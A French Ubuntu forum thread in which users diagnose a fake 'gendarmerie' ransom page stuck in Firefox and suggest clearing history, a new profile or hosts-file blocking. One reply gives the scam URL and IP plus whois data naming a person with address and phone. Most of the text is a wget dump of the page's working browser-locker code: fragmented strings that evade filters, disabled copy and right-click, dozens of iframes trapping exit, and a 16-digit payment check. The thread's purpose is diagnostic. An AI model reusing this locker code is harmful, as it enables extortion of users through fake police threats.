Contenu | Rechercher | Menus

Annonce

Si vous rencontrez des soucis à rester connecté sur le forum (ou si vous avez perdu votre mot de passe) déconnectez-vous et reconnectez-vous depuis cette page, en cochant la case "Me connecter automatiquement lors de mes prochaines visites".
Test de l'ISO d'Ubuntu francophone : nous avons besoin de testeurs pour la version francophone d'Ubuntu 14.04. Liens et informations ici.

#1 Le 02/11/2013, à 20:06

maurizio

[résolu] Ransomwares. gendarmerie constaté sur ubuntu

bonsoir à tous.
Voici un fléau qui fait des ravages sur windows, je pensais étre à l'abri de cette menace avec linux mais malheureusement non car le pc de mon beaufrère  est infester par un ransomware qui est une nouvelle génération de malwares.
Suite à la navigation sur un site de streaming le message suivant apparait tout le temps, également apres redémarrage
ransomwares gendarmerie

Le virus qui affiche un faux message de gendarmerie et qui demande le paiement d'une amende.

A ton une solution? merci à tous!

Hors ligne

#2 Le 02/11/2013, à 20:30

U-topic

Re : [résolu] Ransomwares. gendarmerie constaté sur ubuntu

Bonsoir,
Le message apparaît quand? Où ? Quelle version d'ubuntu ?

Hors ligne

#3 Le 02/11/2013, à 21:31

maurizio

Re : [résolu] Ransomwares. gendarmerie constaté sur ubuntu

le message apparaît en ouvrant firefox et uniquement sur le navigateur, la version ubuntu : 12.04 LTS

Hors ligne

#4 Le 02/11/2013, à 21:35

lann

Re : [résolu] Ransomwares. gendarmerie constaté sur ubuntu

Il faudrait supprimer ton historique :
Historique/Supprimer l'historique récent

Mais ce problème n'a rien à voir avec l'OS

Dernière modification par lann (Le 02/11/2013, à 21:35)

Hors ligne

#5 Le 02/11/2013, à 21:57

Flo_

Re : [résolu] Ransomwares. gendarmerie constaté sur ubuntu

Je crois que j'ai déjà vu ce genre de chose, c'est une page web qu'on ne peut pas fermer, mais elle n’empêche pas la navigation sur d'autres onglets et ne perturbe pas le fonctionnement de l'ordinateur.

Si je retrouve une adresse de ce genre je la posterai.

Hors ligne

#6 Le 02/11/2013, à 22:17

U-topic

Re : [résolu] Ransomwares. gendarmerie constaté sur ubuntu

Effectivement, rien à voir avec l'os...
Si tu n'as rien à sauvegarder dans ton profil tu peux t'en re-créer un en appelant firefox avec

firefox -P

PS : Sinon ca doit juste être ta page d'accueil de changëe smile

Dernière modification par U-topic (Le 02/11/2013, à 22:19)

Hors ligne

#7 Le 02/11/2013, à 22:23

lynn

Re : [résolu] Ransomwares. gendarmerie constaté sur ubuntu

Si c'est une page web, il suffit d'ajouter son adresse dans le fichier hosts; Elle sera bloquée avant même de pouvoir s'ouvrir.


Linux est la solution ! Au fait, c'est quoi ton problème ?
Ubuntu 14.04 - 64 bits  -  Ubuntu 14.10 - 64 bits - Utopic Unicorn

Hors ligne

#8 Le 02/11/2013, à 23:06

Flo_

Re : [résolu] Ransomwares. gendarmerie constaté sur ubuntu

J'ai retrouvé l'adresse :
Attention si vous cliquez dessus !
http://europol.europe.eu.france.id21536 … e_id=23375

donc l'ip à bloquer : 193.169.86.250

Hors ligne

#9 Le 02/11/2013, à 23:14

lann

Re : [résolu] Ransomwares. gendarmerie constaté sur ubuntu

whois 193.169.86.250
inetnum:        193.169.86.0 - 193.169.87.255
netname:        XServer-IP-Network-2
descr:          PE Ivanov Vitaliy Sergeevich
country:        UA
org:            ORG-IV2-RIPE
admin-c:        IV25-RIPE
tech-c:         IV25-RIPE
status:         ASSIGNED PI
mnt-by:         RIPE-NCC-END-MNT
mnt-by:         MNT-IV25
mnt-lower:      RIPE-NCC-END-MNT
mnt-routes:     MNT-IV25
mnt-routes:     MHOST-MNT
mnt-routes:     ITL-MNT
mnt-domains:    MNT-IV25
source:         RIPE # Filtered

organisation:   ORG-IV2-RIPE
org-name:       PE Ivanov Vitaliy Sergeevich
org-type:       OTHER
address:        42-A Tobolskaya street, office 230, Kharkov, Ukraine
mnt-ref:        MNT-IV25
mnt-by:         MNT-IV25
source:         RIPE # Filtered

person:         Ivanov Vitaliy
address:        42-A Tobolskaya street, office 230, Kharkov, Ukraine
phone:          +380 57 728 12 67
nic-hdl:        IV25-RIPE
mnt-by:         MNT-IV25
source:         RIPE # Filtered

% Information related to '193.169.86.0/23AS48031'

route:          193.169.86.0/23
descr:          XSERVER
origin:         AS48031
mnt-by:         MNT-IV25
source:         RIPE # Filtered

% This query was served by the RIPE Database Query Service version 1.69 (WHOIS3)

Hors ligne

#10 Le 02/11/2013, à 23:17

lann

Re : [résolu] Ransomwares. gendarmerie constaté sur ubuntu

et un

wget http://europol.europe.eu.france.id215363848-9612179532.v1143.com/?flow_id=3066&171967=19360/case_id=23375
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascript">
	window.onbeforeunload = function(env){
		var str = "Vo" + "tre " + "naviga" + "teur a été b" + "lo" + "qué.\n\nTout les do" + "nnées d’ord" + "nat" + "eur ser" + "ont déte" + "nus et les pr" + "océdu" + "res cri" + "mene" + "les se" + "ra ini" + "tié con" + "tre v" + "ous s" + "i l'am" + "end" + "e se" + "ra pa" + "s pa" + "yé" + "e.";
		alert(str);
		return str;
	}
</script>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vоtrе nаvigаtеur а été blоqué</title>
<link href="favicon.ico" type="favicon" rel="icon" />
<script type="text/javascript" src="fr/jquery.js"></script>
<link rel="stylesheet" type="text/css" media="all" href="fr/style.css" />

<style>
::-moz-selection {
background: transparent;
}
</style>
<script type="text/javascript">
document.ondragstart = test;
document.onselectstart = test;
document.oncontextmenu = test;
function test() {
return false;
}
document.oncontextmenu;
function catchControlKeys(event){
var code=event.keyCode ? event.keyCode : event.which ? event.which : null;
if (event.ctrlKey){
// Ctrl+U
if (code == 117) return false;
if (code == 85) return false;
// Ctrl+C
if (code == 99) return false;
if (code == 67) return false;
// Ctrl+A
if (code == 97) return false;
if (code == 65) return false;
}
}
</script><script type="text/javascript">
function check(){
	var input = document.getElementsByTagName('input');
	var result = true;
if(input[0].value.length != 16 || input[0].value.charAt(0) != '0'){
alert('Votre information de paiement nést pas correct. Tout lеs données d’ordnаtеur sеront détеnus еt lеs prоcédures crimеnеlеs sеra initié contrе vоus si l’amеnde sеra pаs payée.');
result = false;
} else {

window.onbeforeunload = null;
window.document.body.onbeforeunload = null;

var strongs = document.getElementsByTagName("iframe");
for (var i=strongs.length - 1; i>=0; i--){
	var strong = strongs[i];
	var acceptor = strong.parentNode;
	while(strong.childNodes.length){
	var child = strong.childNodes[0];
		strong.removeChild(child);
		acceptor.insertBefore(child, strong);
	};
	acceptor.removeChild(strong);
};

}

return result;
}
</script>
</head>
<body onkeypress="return catchControlKeys(event);">

<iframe test="test" srcdoc="<script> window.onbeforeunload=function(env){ return 'Vоtrе nаvigаtеur а été blоqué. Tоut lеs dоnnéеs d’оrdnatеur sеrоnt détеnus еt lеs prоcédurеs crimеnеlеs sеra initié cоntrе vоus si l’amеndе sеra pas payéе.';} </script>" src="fr/close.php"></iframe>

 <!-- 1575 --> 


<iframe test="test" srcdoc="<script> window.onbeforeunload=function(env){ return 'Vоtrе nаvigаtеur а été blоqué. Tоut lеs dоnnéеs d’оrdnatеur sеrоnt détеnus еt lеs prоcédurеs crimеnеlеs sеra initié cоntrе vоus si l’amеndе sеra pas payéе.';} </script>" src="fr/close.php"></iframe>

 <!-- 2031 --> 


<iframe test="test" srcdoc="<script> window.onbeforeunload=function(env){ return 'Vоtrе nаvigаtеur а été blоqué. Tоut lеs dоnnéеs d’оrdnatеur sеrоnt détеnus еt lеs prоcédurеs crimеnеlеs sеra initié cоntrе vоus si l’amеndе sеra pas payéе.';} </script>" src="fr/close.php"></iframe>

 <!-- 6782 --> 


<iframe test="test" srcdoc="<script> window.onbeforeunload=function(env){ return 'Vоtrе nаvigаtеur а été blоqué. Tоut lеs dоnnéеs d’оrdnatеur sеrоnt détеnus еt lеs prоcédurеs crimеnеlеs sеra initié cоntrе vоus si l’amеndе sеra pas payéе.';} </script>" src="fr/close.php"></iframe>

 <!-- 1890 --> 


<iframe test="test" srcdoc="<script> window.onbeforeunload=function(env){ return 'Vоtrе nаvigаtеur а été blоqué. Tоut lеs dоnnéеs d’оrdnatеur sеrоnt détеnus еt lеs prоcédurеs crimеnеlеs sеra initié cоntrе vоus si l’amеndе sеra pas payéе.';} </script>" src="fr/close.php"></iframe>

 <!-- 6227 --> 


<iframe test="test" srcdoc="<script> window.onbeforeunload=function(env){ return 'Vоtrе nаvigаtеur а été blоqué. Tоut lеs dоnnéеs d’оrdnatеur sеrоnt détеnus еt lеs prоcédurеs crimеnеlеs sеra initié cоntrе vоus si l’amеndе sеra pas payéе.';} </script>" src="fr/close.php"></iframe>

 <!-- 6070 --> 


<iframe test="test" srcdoc="<script> window.onbeforeunload=function(env){ return 'Vоtrе nаvigаtеur а été blоqué. Tоut lеs dоnnéеs d’оrdnatеur sеrоnt détеnus еt lеs prоcédurеs crimеnеlеs sеra initié cоntrе vоus si l’amеndе sеra pas payéе.';} </script>" src="fr/close.php"></iframe>

 <!-- 8444 --> 


<iframe test="test" srcdoc="<script> window.onbeforeunload=function(env){ return 'Vоtrе nаvigаtеur а été blоqué. Tоut lеs dоnnéеs d’оrdnatеur sеrоnt détеnus еt lеs prоcédurеs crimеnеlеs sеra initié cоntrе vоus si l’amеndе sеra pas payéе.';} </script>" src="fr/close.php"></iframe>

 <!-- 8461 --> 


<iframe test="test" srcdoc="<script> window.onbeforeunload=function(env){ return 'Vоtrе nаvigаtеur а été blоqué. Tоut lеs dоnnéеs d’оrdnatеur sеrоnt détеnus еt lеs prоcédurеs crimеnеlеs sеra initié cоntrе vоus si l’amеndе sеra pas payéе.';} </script>" src="fr/close.php"></iframe>

 <!-- 4147 --> 


<iframe test="test" srcdoc="<script> window.onbeforeunload=function(env){ return 'Vоtrе nаvigаtеur а été blоqué. Tоut lеs dоnnéеs d’оrdnatеur sеrоnt détеnus еt lеs prоcédurеs crimеnеlеs sеra initié cоntrе vоus si l’amеndе sеra pas payéе.';} </script>" src="fr/close.php"></iframe>

 <!-- 9834 --> 


<iframe test="test" srcdoc="<script> window.onbeforeunload=function(env){ return 'Vоtrе nаvigаtеur а été blоqué. Tоut lеs dоnnéеs d’оrdnatеur sеrоnt détеnus еt lеs prоcédurеs crimеnеlеs sеra initié cоntrе vоus si l’amеndе sеra pas payéе.';} </script>" src="fr/close.php"></iframe>

 <!-- 2475 --> 


<iframe test="test" srcdoc="<script> window.onbeforeunload=function(env){ return 'Vоtrе nаvigаtеur а été blоqué. Tоut lеs dоnnéеs d’оrdnatеur sеrоnt détеnus еt lеs prоcédurеs crimеnеlеs sеra initié cоntrе vоus si l’amеndе sеra pas payéе.';} </script>" src="fr/close.php"></iframe>

 <!-- 2274 --> 


<iframe test="test" srcdoc="<script> window.onbeforeunload=function(env){ return 'Vоtrе nаvigаtеur а été blоqué. Tоut lеs dоnnéеs d’оrdnatеur sеrоnt détеnus еt lеs prоcédurеs crimеnеlеs sеra initié cоntrе vоus si l’amеndе sеra pas payéе.';} </script>" src="fr/close.php"></iframe>

 <!-- 1797 --> 


<iframe test="test" srcdoc="<script> window.onbeforeunload=function(env){ return 'Vоtrе nаvigаtеur а été blоqué. Tоut lеs dоnnéеs d’оrdnatеur sеrоnt détеnus еt lеs prоcédurеs crimеnеlеs sеra initié cоntrе vоus si l’amеndе sеra pas payéе.';} </script>" src="fr/close.php"></iframe>

 <!-- 3481 --> 


<iframe test="test" srcdoc="<script> window.onbeforeunload=function(env){ return 'Vоtrе nаvigаtеur а été blоqué. Tоut lеs dоnnéеs d’оrdnatеur sеrоnt détеnus еt lеs prоcédurеs crimеnеlеs sеra initié cоntrе vоus si l’amеndе sеra pas payéе.';} </script>" src="fr/close.php"></iframe>

 <!-- 4653 --> 


<iframe test="test" srcdoc="<script> window.onbeforeunload=function(env){ return 'Vоtrе nаvigаtеur а été blоqué. Tоut lеs dоnnéеs d’оrdnatеur sеrоnt détеnus еt lеs prоcédurеs crimеnеlеs sеra initié cоntrе vоus si l’amеndе sеra pas payéе.';} </script>" src="fr/close.php"></iframe>

 <!-- 7627 --> 


<iframe test="test" srcdoc="<script> window.onbeforeunload=function(env){ return 'Vоtrе nаvigаtеur а été blоqué. Tоut lеs dоnnéеs d’оrdnatеur sеrоnt détеnus еt lеs prоcédurеs crimеnеlеs sеra initié cоntrе vоus si l’amеndе sеra pas payéе.';} </script>" src="fr/close.php"></iframe>

 <!-- 1801 --> 


<iframe test="test" srcdoc="<script> window.onbeforeunload=function(env){ return 'Vоtrе nаvigаtеur а été blоqué. Tоut lеs dоnnéеs d’оrdnatеur sеrоnt détеnus еt lеs prоcédurеs crimеnеlеs sеra initié cоntrе vоus si l’amеndе sеra pas payéе.';} </script>" src="fr/close.php"></iframe>

 <!-- 8649 --> 


<iframe test="test" srcdoc="<script> window.onbeforeunload=function(env){ return 'Vоtrе nаvigаtеur а été blоqué. Tоut lеs dоnnéеs d’оrdnatеur sеrоnt détеnus еt lеs prоcédurеs crimеnеlеs sеra initié cоntrе vоus si l’amеndе sеra pas payéе.';} </script>" src="fr/close.php"></iframe>

 <!-- 4895 --> 


<iframe test="test" srcdoc="<script> window.onbeforeunload=function(env){ return 'Vоtrе nаvigаtеur а été blоqué. Tоut lеs dоnnéеs d’оrdnatеur sеrоnt détеnus еt lеs prоcédurеs crimеnеlеs sеra initié cоntrе vоus si l’amеndе sеra pas payéе.';} </script>" src="fr/close.php"></iframe>

 <!-- 9738 --> 


<iframe test="test" srcdoc="<script> window.onbeforeunload=function(env){ return 'Vоtrе nаvigаtеur а été blоqué. Tоut lеs dоnnéеs d’оrdnatеur sеrоnt détеnus еt lеs prоcédurеs crimеnеlеs sеra initié cоntrе vоus si l’amеndе sеra pas payéе.';} </script>" src="fr/close.php"></iframe>

 <!-- 3672 --> 


<iframe test="test" srcdoc="<script> window.onbeforeunload=function(env){ return 'Vоtrе nаvigаtеur а été blоqué. Tоut lеs dоnnéеs d’оrdnatеur sеrоnt détеnus еt lеs prоcédurеs crimеnеlеs sеra initié cоntrе vоus si l’amеndе sеra pas payéе.';} </script>" src="fr/close.php"></iframe>

 <!-- 7942 --> 


<iframe test="test" srcdoc="<script> window.onbeforeunload=function(env){ return 'Vоtrе nаvigаtеur а été blоqué. Tоut lеs dоnnéеs d’оrdnatеur sеrоnt détеnus еt lеs prоcédurеs crimеnеlеs sеra initié cоntrе vоus si l’amеndе sеra pas payéе.';} </script>" src="fr/close.php"></iframe>

 <!-- 7147 --> 


<iframe test="test" srcdoc="<script> window.onbeforeunload=function(env){ return 'Vоtrе nаvigаtеur а été blоqué. Tоut lеs dоnnéеs d’оrdnatеur sеrоnt détеnus еt lеs prоcédurеs crimеnеlеs sеra initié cоntrе vоus si l’amеndе sеra pas payéе.';} </script>" src="fr/close.php"></iframe>

 <!-- 4287 --> 


<iframe test="test" srcdoc="<script> window.onbeforeunload=function(env){ return 'Vоtrе nаvigаtеur а été blоqué. Tоut lеs dоnnéеs d’оrdnatеur sеrоnt détеnus еt lеs prоcédurеs crimеnеlеs sеra initié cоntrе vоus si l’amеndе sеra pas payéе.';} </script>" src="fr/close.php"></iframe>

 <!-- 2987 --> 


<iframe test="test" srcdoc="<script> window.onbeforeunload=function(env){ return 'Vоtrе nаvigаtеur а été blоqué. Tоut lеs dоnnéеs d’оrdnatеur sеrоnt détеnus еt lеs prоcédurеs crimеnеlеs sеra initié cоntrе vоus si l’amеndе sеra pas payéе.';} </script>" src="fr/close.php"></iframe>

 <!-- 8367 --> 


<iframe test="test" srcdoc="<script> window.onbeforeunload=function(env){ return 'Vоtrе nаvigаtеur а été blоqué. Tоut lеs dоnnéеs d’оrdnatеur sеrоnt détеnus еt lеs prоcédurеs crimеnеlеs sеra initié cоntrе vоus si l’amеndе sеra pas payéе.';} </script>" src="fr/close.php"></iframe>

 <!-- 3136 --> 


<iframe test="test" srcdoc="<script> window.onbeforeunload=function(env){ return 'Vоtrе nаvigаtеur а été blоqué. Tоut lеs dоnnéеs d’оrdnatеur sеrоnt détеnus еt lеs prоcédurеs crimеnеlеs sеra initié cоntrе vоus si l’amеndе sеra pas payéе.';} </script>" src="fr/close.php"></iframe>

 <!-- 1089 --> 


<iframe test="test" srcdoc="<script> window.onbeforeunload=function(env){ return 'Vоtrе nаvigаtеur а été blоqué. Tоut lеs dоnnéеs d’оrdnatеur sеrоnt détеnus еt lеs prоcédurеs crimеnеlеs sеra initié cоntrе vоus si l’amеndе sеra pas payéе.';} </script>" src="fr/close.php"></iframe>

 <!-- 1772 --> 


<iframe test="test" srcdoc="<script> window.onbeforeunload=function(env){ return 'Vоtrе nаvigаtеur а été blоqué. Tоut lеs dоnnéеs d’оrdnatеur sеrоnt détеnus еt lеs prоcédurеs crimеnеlеs sеra initié cоntrе vоus si l’amеndе sеra pas payéе.';} </script>" src="fr/close.php"></iframe>

 <!-- 2140 --> 


<iframe test="test" srcdoc="<script> window.onbeforeunload=function(env){ return 'Vоtrе nаvigаtеur а été blоqué. Tоut lеs dоnnéеs d’оrdnatеur sеrоnt détеnus еt lеs prоcédurеs crimеnеlеs sеra initié cоntrе vоus si l’amеndе sеra pas payéе.';} </script>" src="fr/close.php"></iframe>

 <!-- 8849 --> 


<iframe test="test" srcdoc="<script> window.onbeforeunload=function(env){ return 'Vоtrе nаvigаtеur а été blоqué. Tоut lеs dоnnéеs d’оrdnatеur sеrоnt détеnus еt lеs prоcédurеs crimеnеlеs sеra initié cоntrе vоus si l’amеndе sеra pas payéе.';} </script>" src="fr/close.php"></iframe>

 <!-- 2347 --> 


<iframe test="test" srcdoc="<script> window.onbeforeunload=function(env){ return 'Vоtrе nаvigаtеur а été blоqué. Tоut lеs dоnnéеs d’оrdnatеur sеrоnt détеnus еt lеs prоcédurеs crimеnеlеs sеra initié cоntrе vоus si l’amеndе sеra pas payéе.';} </script>" src="fr/close.php"></iframe>

 <!-- 3172 --> 


<iframe test="test" srcdoc="<script> window.onbeforeunload=function(env){ return 'Vоtrе nаvigаtеur а été blоqué. Tоut lеs dоnnéеs d’оrdnatеur sеrоnt détеnus еt lеs prоcédurеs crimеnеlеs sеra initié cоntrе vоus si l’amеndе sеra pas payéе.';} </script>" src="fr/close.php"></iframe>

 <!-- 5632 --> 


<iframe test="test" srcdoc="<script> window.onbeforeunload=function(env){ return 'Vоtrе nаvigаtеur а été blоqué. Tоut lеs dоnnéеs d’оrdnatеur sеrоnt détеnus еt lеs prоcédurеs crimеnеlеs sеra initié cоntrе vоus si l’amеndе sеra pas payéе.';} </script>" src="fr/close.php"></iframe>

 <!-- 3238 --> 


<iframe test="test" srcdoc="<script> window.onbeforeunload=function(env){ return 'Vоtrе nаvigаtеur а été blоqué. Tоut lеs dоnnéеs d’оrdnatеur sеrоnt détеnus еt lеs prоcédurеs crimеnеlеs sеra initié cоntrе vоus si l’amеndе sеra pas payéе.';} </script>" src="fr/close.php"></iframe>

 <!-- 8400 --> 


<iframe test="test" srcdoc="<script> window.onbeforeunload=function(env){ return 'Vоtrе nаvigаtеur а été blоqué. Tоut lеs dоnnéеs d’оrdnatеur sеrоnt détеnus еt lеs prоcédurеs crimеnеlеs sеra initié cоntrе vоus si l’amеndе sеra pas payéе.';} </script>" src="fr/close.php"></iframe>

 <!-- 1702 --> 


<iframe test="test" srcdoc="<script> window.onbeforeunload=function(env){ return 'Vоtrе nаvigаtеur а été blоqué. Tоut lеs dоnnéеs d’оrdnatеur sеrоnt détеnus еt lеs prоcédurеs crimеnеlеs sеra initié cоntrе vоus si l’amеndе sеra pas payéе.';} </script>" src="fr/close.php"></iframe>

 <!-- 1683 --> 


<iframe test="test" srcdoc="<script> window.onbeforeunload=function(env){ return 'Vоtrе nаvigаtеur а été blоqué. Tоut lеs dоnnéеs d’оrdnatеur sеrоnt détеnus еt lеs prоcédurеs crimеnеlеs sеra initié cоntrе vоus si l’amеndе sеra pas payéе.';} </script>" src="fr/close.php"></iframe>

 <!-- 6861 --> 


<iframe test="test" srcdoc="<script> window.onbeforeunload=function(env){ return 'Vоtrе nаvigаtеur а été blоqué. Tоut lеs dоnnéеs d’оrdnatеur sеrоnt détеnus еt lеs prоcédurеs crimеnеlеs sеra initié cоntrе vоus si l’amеndе sеra pas payéе.';} </script>" src="fr/close.php"></iframe>

 <!-- 4850 --> 


<iframe test="test" srcdoc="<script> window.onbeforeunload=function(env){ return 'Vоtrе nаvigаtеur а été blоqué. Tоut lеs dоnnéеs d’оrdnatеur sеrоnt détеnus еt lеs prоcédurеs crimеnеlеs sеra initié cоntrе vоus si l’amеndе sеra pas payéе.';} </script>" src="fr/close.php"></iframe>

 <!-- 1517 --> 


<iframe test="test" srcdoc="<script> window.onbeforeunload=function(env){ return 'Vоtrе nаvigаtеur а été blоqué. Tоut lеs dоnnéеs d’оrdnatеur sеrоnt détеnus еt lеs prоcédurеs crimеnеlеs sеra initié cоntrе vоus si l’amеndе sеra pas payéе.';} </script>" src="fr/close.php"></iframe>

 <!-- 8337 --> 


<iframe test="test" srcdoc="<script> window.onbeforeunload=function(env){ return 'Vоtrе nаvigаtеur а été blоqué. Tоut lеs dоnnéеs d’оrdnatеur sеrоnt détеnus еt lеs prоcédurеs crimеnеlеs sеra initié cоntrе vоus si l’amеndе sеra pas payéе.';} </script>" src="fr/close.php"></iframe>

 <!-- 6124 --> 


<iframe test="test" srcdoc="<script> window.onbeforeunload=function(env){ return 'Vоtrе nаvigаtеur а été blоqué. Tоut lеs dоnnéеs d’оrdnatеur sеrоnt détеnus еt lеs prоcédurеs crimеnеlеs sеra initié cоntrе vоus si l’amеndе sеra pas payéе.';} </script>" src="fr/close.php"></iframe>

 <!-- 2315 --> 


<iframe test="test" srcdoc="<script> window.onbeforeunload=function(env){ return 'Vоtrе nаvigаtеur а été blоqué. Tоut lеs dоnnéеs d’оrdnatеur sеrоnt détеnus еt lеs prоcédurеs crimеnеlеs sеra initié cоntrе vоus si l’amеndе sеra pas payéе.';} </script>" src="fr/close.php"></iframe>

 <!-- 1819 --> 


<iframe test="test" srcdoc="<script> window.onbeforeunload=function(env){ return 'Vоtrе nаvigаtеur а été blоqué. Tоut lеs dоnnéеs d’оrdnatеur sеrоnt détеnus еt lеs prоcédurеs crimеnеlеs sеra initié cоntrе vоus si l’amеndе sеra pas payéе.';} </script>" src="fr/close.php"></iframe>

 <!-- 9778 --> 


<iframe test="test" srcdoc="<script> window.onbeforeunload=function(env){ return 'Vоtrе nаvigаtеur а été blоqué. Tоut lеs dоnnéеs d’оrdnatеur sеrоnt détеnus еt lеs prоcédurеs crimеnеlеs sеra initié cоntrе vоus si l’amеndе sеra pas payéе.';} </script>" src="fr/close.php"></iframe>

 <!-- 8943 --> 


<iframe test="test" srcdoc="<script> window.onbeforeunload=function(env){ return 'Vоtrе nаvigаtеur а été blоqué. Tоut lеs dоnnéеs d’оrdnatеur sеrоnt détеnus еt lеs prоcédurеs crimеnеlеs sеra initié cоntrе vоus si l’amеndе sеra pas payéе.';} </script>" src="fr/close.php"></iframe>

 <!-- 2620 --> 


<iframe test="test" srcdoc="<script> window.onbeforeunload=function(env){ return 'Vоtrе nаvigаtеur а été blоqué. Tоut lеs dоnnéеs d’оrdnatеur sеrоnt détеnus еt lеs prоcédurеs crimеnеlеs sеra initié cоntrе vоus si l’amеndе sеra pas payéе.';} </script>" src="fr/close.php"></iframe>

 <!-- 8427 --> 


<iframe test="test" srcdoc="<script> window.onbeforeunload=function(env){ return 'Vоtrе nаvigаtеur а été blоqué. Tоut lеs dоnnéеs d’оrdnatеur sеrоnt détеnus еt lеs prоcédurеs crimеnеlеs sеra initié cоntrе vоus si l’amеndе sеra pas payéе.';} </script>" src="fr/close.php"></iframe>

 <!-- 3838 --> 


<iframe test="test" srcdoc="<script> window.onbeforeunload=function(env){ return 'Vоtrе nаvigаtеur а été blоqué. Tоut lеs dоnnéеs d’оrdnatеur sеrоnt détеnus еt lеs prоcédurеs crimеnеlеs sеra initié cоntrе vоus si l’amеndе sеra pas payéе.';} </script>" src="fr/close.php"></iframe>

 <!-- 2358 --> 


<iframe test="test" srcdoc="<script> window.onbeforeunload=function(env){ return 'Vоtrе nаvigаtеur а été blоqué. Tоut lеs dоnnéеs d’оrdnatеur sеrоnt détеnus еt lеs prоcédurеs crimеnеlеs sеra initié cоntrе vоus si l’amеndе sеra pas payéе.';} </script>" src="fr/close.php"></iframe>

 <!-- 2100 --> 


<iframe test="test" srcdoc="<script> window.onbeforeunload=function(env){ return 'Vоtrе nаvigаtеur а été blоqué. Tоut lеs dоnnéеs d’оrdnatеur sеrоnt détеnus еt lеs prоcédurеs crimеnеlеs sеra initié cоntrе vоus si l’amеndе sеra pas payéе.';} </script>" src="fr/close.php"></iframe>

 <!-- 1781 --> 


<iframe test="test" srcdoc="<script> window.onbeforeunload=function(env){ return 'Vоtrе nаvigаtеur а été blоqué. Tоut lеs dоnnéеs d’оrdnatеur sеrоnt détеnus еt lеs prоcédurеs crimеnеlеs sеra initié cоntrе vоus si l’amеndе sеra pas payéе.';} </script>" src="fr/close.php"></iframe>

 <!-- 8506 --> 


<iframe test="test" srcdoc="<script> window.onbeforeunload=function(env){ return 'Vоtrе nаvigаtеur а été blоqué. Tоut lеs dоnnéеs d’оrdnatеur sеrоnt détеnus еt lеs prоcédurеs crimеnеlеs sеra initié cоntrе vоus si l’amеndе sеra pas payéе.';} </script>" src="fr/close.php"></iframe>

 <!-- 5388 --> 


<iframe test="test" srcdoc="<script> window.onbeforeunload=function(env){ return 'Vоtrе nаvigаtеur а été blоqué. Tоut lеs dоnnéеs d’оrdnatеur sеrоnt détеnus еt lеs prоcédurеs crimеnеlеs sеra initié cоntrе vоus si l’amеndе sеra pas payéе.';} </script>" src="fr/close.php"></iframe>

 <!-- 3768 --> 


<iframe test="test" srcdoc="<script> window.onbeforeunload=function(env){ return 'Vоtrе nаvigаtеur а été blоqué. Tоut lеs dоnnéеs d’оrdnatеur sеrоnt détеnus еt lеs prоcédurеs crimеnеlеs sеra initié cоntrе vоus si l’amеndе sеra pas payéе.';} </script>" src="fr/close.php"></iframe>

 <!-- 6873 --> 


<iframe test="test" srcdoc="<script> window.onbeforeunload=function(env){ return 'Vоtrе nаvigаtеur а été blоqué. Tоut lеs dоnnéеs d’оrdnatеur sеrоnt détеnus еt lеs prоcédurеs crimеnеlеs sеra initié cоntrе vоus si l’amеndе sеra pas payéе.';} </script>" src="fr/close.php"></iframe>

 <!-- 7524 --> 


<iframe test="test" srcdoc="<script> window.onbeforeunload=function(env){ return 'Vоtrе nаvigаtеur а été blоqué. Tоut lеs dоnnéеs d’оrdnatеur sеrоnt détеnus еt lеs prоcédurеs crimеnеlеs sеra initié cоntrе vоus si l’amеndе sеra pas payéе.';} </script>" src="fr/close.php"></iframe>

 <!-- 3857 --> 


<iframe test="test" srcdoc="<script> window.onbeforeunload=function(env){ return 'Vоtrе nаvigаtеur а été blоqué. Tоut lеs dоnnéеs d’оrdnatеur sеrоnt détеnus еt lеs prоcédurеs crimеnеlеs sеra initié cоntrе vоus si l’amеndе sеra pas payéе.';} </script>" src="fr/close.php"></iframe>

 <!-- 7645 --> 


<iframe test="test" srcdoc="<script> window.onbeforeunload=function(env){ return 'Vоtrе nаvigаtеur а été blоqué. Tоut lеs dоnnéеs d’оrdnatеur sеrоnt détеnus еt lеs prоcédurеs crimеnеlеs sеra initié cоntrе vоus si l’amеndе sеra pas payéе.';} </script>" src="fr/close.php"></iframe>

 <!-- 8665 --> 


<iframe test="test" srcdoc="<script> window.onbeforeunload=function(env){ return 'Vоtrе nаvigаtеur а été blоqué. Tоut lеs dоnnéеs d’оrdnatеur sеrоnt détеnus еt lеs prоcédurеs crimеnеlеs sеra initié cоntrе vоus si l’amеndе sеra pas payéе.';} </script>" src="fr/close.php"></iframe>

 <!-- 2706 --> 


<iframe test="test" srcdoc="<script> window.onbeforeunload=function(env){ return 'Vоtrе nаvigаtеur а été blоqué. Tоut lеs dоnnéеs d’оrdnatеur sеrоnt détеnus еt lеs prоcédurеs crimеnеlеs sеra initié cоntrе vоus si l’amеndе sеra pas payéе.';} </script>" src="fr/close.php"></iframe>

 <!-- 8993 --> 


<iframe test="test" srcdoc="<script> window.onbeforeunload=function(env){ return 'Vоtrе nаvigаtеur а été blоqué. Tоut lеs dоnnéеs d’оrdnatеur sеrоnt détеnus еt lеs prоcédurеs crimеnеlеs sеra initié cоntrе vоus si l’amеndе sеra pas payéе.';} </script>" src="fr/close.php"></iframe>

 <!-- 1837 --> 


<iframe test="test" srcdoc="<script> window.onbeforeunload=function(env){ return 'Vоtrе nаvigаtеur а été blоqué. Tоut lеs dоnnéеs d’оrdnatеur sеrоnt détеnus еt lеs prоcédurеs crimеnеlеs sеra initié cоntrе vоus si l’amеndе sеra pas payéе.';} </script>" src="fr/close.php"></iframe>

 <!-- 7339 --> 


<iframe test="test" srcdoc="<script> window.onbeforeunload=function(env){ return 'Vоtrе nаvigаtеur а été blоqué. Tоut lеs dоnnéеs d’оrdnatеur sеrоnt détеnus еt lеs prоcédurеs crimеnеlеs sеra initié cоntrе vоus si l’amеndе sеra pas payéе.';} </script>" src="fr/close.php"></iframe>

 <!-- 2231 --> 


<iframe test="test" srcdoc="<script> window.onbeforeunload=function(env){ return 'Vоtrе nаvigаtеur а été blоqué. Tоut lеs dоnnéеs d’оrdnatеur sеrоnt détеnus еt lеs prоcédurеs crimеnеlеs sеra initié cоntrе vоus si l’amеndе sеra pas payéе.';} </script>" src="fr/close.php"></iframe>

 <!-- 9237 --> 


